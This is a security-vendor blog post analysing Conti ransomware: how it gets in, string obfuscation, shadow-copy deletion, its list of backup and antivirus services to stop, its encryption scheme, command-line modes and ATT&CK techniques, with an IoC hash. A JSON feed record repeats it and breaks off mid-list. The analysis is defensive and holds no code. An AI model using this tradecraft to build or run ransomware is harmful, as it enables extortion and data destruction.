Conti Ransomware

2021-11-18T17:17:56

Description

Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe. The most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks. A Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim’s network. They check for the "PrintNightmare" vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the "Zerologon" vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC). Conti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims’ networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder. ### Technical Details: Conti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses. ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-1-De-obfuscation-of-Windows-API.png)Fig. 1 De-obfuscation of Windows API Conti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-2-String-Decryption-Routine.png)Fig. 2 String Decryption Routine After getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of "_CONTI_" as shown below in Fig. 3: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-3-Create-Mutex.png)Fig. 3 Create Mutex It deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-4-Deletes-Windows-Volume-Shadow-Copy.png)Fig. 4 Deletes Windows Volume Shadow Copy Next, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-5-Stop-Potential-Windows-Services.png)Fig. 5 Stop Potential Windows Services The table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop. MSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT ---|---|--- MSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 MSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC MSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS MSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA MSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER MSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper MSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 MSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService MSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 Acronis VSS Provider| Mfemms| DCAgent AcronisAgent| Mfevtp| EhttpSrv AcrSch2Svc| MMS| Ekrn Antivirus| Mozyprobackup| Enterprise Client Service ARSM| MsDtsServer| EPSecurityService AVP| MsDtsServer100| EPUpdateService BackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 BackupExecAgentBrowser| MSExchangeES| EsgShKernel BackupExecDeviceMediaService| MSExchangeIS| ESHASRV BackupExecJobEngine| MSExchangeMGMT| FA_Scheduler BackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA BackupExecRPCService| MSExchangeSA| McShield BackupExecVSSProvider| MSExchangeSRS| McTaskManager Bedbg| msftesql$PROD| Mfefire IISAdmin| MSOLAP$SQL_2008| Klnagent IMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS Conti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-6-Unlock-files-with-Windows-Restart-Manager.png)Fig. 6 Unlock files with Windows Restart Manager It collects information about drives and drive types present on compromised systems: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-7-Collect-Drives-Information.png)Fig. 7 Collect Drives Information As shown in Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-8-Implementation-of-Multi-threaded-Processing-1.png)Fig. 8 Implementation of Multi-threaded Processing ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-9-Multiple-Threads-Perform-File-Encryption.png)Fig. 9 Multiple Threads Perform File Encryption Conti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-10-Getting-Info-of-Remote-Shares.png)Fig. 10 Getting Info of Remote Shares It collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for "172.", "192.168." etc., on the collected IP list. If an IP address is in a different range it skips that system from encryption: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-11-Collect-ARP-Cache-Information.png)Fig. 11 Collect ARP Cache Information It uses an AES-256 encryption key per file with a hard-codedRAS-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier and is only alg_id: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-12-Create-CALG_AES_256-Key.png)Fig. 12 Create CALG_AES_256 Key Conti has a unique feature that allows attackers to perform file encryption in command line mode: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-13-Command-Line-Mode-of-Operation.png)Fig. 13 Command Line Mode of Operation ### Modes of Operation Conti allows 2 command line modes`--encrypt-mode` and `- h`: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-14-Command-Line-encrypt-mode-Mode.png)Fig. 14 Command Line `--encrypt-mode` Mode `--encrypt-mod` marks which files are encrypted. There are 3 options for its value:`all`, `local`, and `network`. By default, ransomware runs with the `all` parameter: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-15-Command-Line-encrypt-mode-with-Value-all.png)Fig. 15 Command Line `--encrypt-mode` with Value `all` In` all`, encryption carried out for - local and network. `network` means that shared resources on the local network will be encrypted: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-16-Command-Line-encrypt-mode-Mode-with-Value-local.png)Fig. 16 Command Line `--encrypt-mode` Mode with Value `local` ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-17-Command-Line-encrypt-mode-Mode-with-Value-network.png)Fig. 17 Command Line `--encrypt-mode` Mode with Value `network` In command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-18-Folders-Ignored-in-Encryption.png)Fig. 18 Folders Ignored in Encryption It skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-19-__CONTI-Extension-Appended-to-Files.png)Fig. 19 __CONTI” Extension Appended to Files ### The Ransom Note: The ransom note and the note’s file information are present in the resource of malware files: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-20-Ransom-Note-Content.png)Fig. 20 Ransom Note Content ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-21-Ransom-Note-Name.png)Fig. 21 Ransom Note Name It calls the `LoadResource` API to get ransom note-related information: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-22-Code-to-Collect-Data-Related-to-the-Ransom-Note.png)Fig. 22 Code to Collect Data Related to the Ransom Note The ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim: ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-23-Ransom-Note.png)Fig. 23 Ransom Note ### IoC: eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe ### TTP Map: Initial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact ---|---|---|---|---|---|---|---|---|---|---|--- Valid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) Phishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) Phishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) Exploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | | Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL (T1547.004)| | | | Network Share Discovery (T1135)| | | | | | Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | | | | | | | Network Service Scanning (T1046)| | | | | | | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | | | | | | | System information discovery (T1082)| | | | | | | | | | | System owner/user discovery (T1033)| | | | | | | | | | | Security software discovery (T1063)| | | | | | | | | | | Account Discovery: Local Account (T1087.001)| | | | | | | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | | | | | | | | | | | | ### Summary To defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.

{"id": "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "Conti Ransomware", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the "PrintNightmare" vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the "Zerologon" vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-1-De-obfuscation-of-Windows-API.png)Fig. 1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-2-String-Decryption-Routine.png)Fig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of "_CONTI_" as shown below in Fig. 3:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-3-Create-Mutex.png)Fig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-4-Deletes-Windows-Volume-Shadow-Copy.png)Fig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-5-Stop-Potential-Windows-Services.png)Fig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield \nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-6-Unlock-files-with-Windows-Restart-Manager.png)Fig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-7-Collect-Drives-Information.png)Fig. 7 Collect Drives Information\n\nAs shown in Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-8-Implementation-of-Multi-threaded-Processing-1.png)Fig. 8 Implementation of Multi-threaded Processing ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-9-Multiple-Threads-Perform-File-Encryption.png)Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-10-Getting-Info-of-Remote-Shares.png)Fig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for "172.", "192.168." etc., on the collected IP list. If an IP address is in a different range it skips that system from encryption:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-11-Collect-ARP-Cache-Information.png)Fig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file with a hard-codedRAS-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier and is only alg_id:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-12-Create-CALG_AES_256-Key.png)Fig. 12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-13-Command-Line-Mode-of-Operation.png)Fig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti allows 2 command line modes`--encrypt-mode` and `- h`:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-14-Command-Line-encrypt-mode-Mode.png)Fig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mod` marks which files are encrypted. There are 3 options for its value:`all`, `local`, and `network`. By default, ransomware runs with the `all` parameter:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-15-Command-Line-encrypt-mode-with-Value-all.png)Fig. 15 Command Line `--encrypt-mode` with Value `all`\n\nIn` all`, encryption carried out for - local and network. `network` means that shared resources on the local network will be encrypted:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-16-Command-Line-encrypt-mode-Mode-with-Value-local.png)Fig. 16 Command Line `--encrypt-mode` Mode with Value `local` ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-17-Command-Line-encrypt-mode-Mode-with-Value-network.png)Fig. 17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-18-Folders-Ignored-in-Encryption.png)Fig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-19-__CONTI-Extension-Appended-to-Files.png)Fig. 19 __CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource of malware files:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-20-Ransom-Note-Content.png)Fig. 20 Ransom Note Content ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-21-Ransom-Note-Name.png)Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-22-Code-to-Collect-Data-Related-to-the-Ransom-Note.png)Fig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-23-Ransom-Note.png)Fig. 23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL (T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "published": "2021-11-18T17:17:56", "modified": "2021-11-18T17:17:56", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Ghanshyam More", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2021-11-18T18:37:13", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:383432", "VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2020-1472", "CVE-2021-34527"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "f5", "idList": ["F5:K57181937", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0BB19334-D311-5464-B40B-7B27A0AD8825", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", 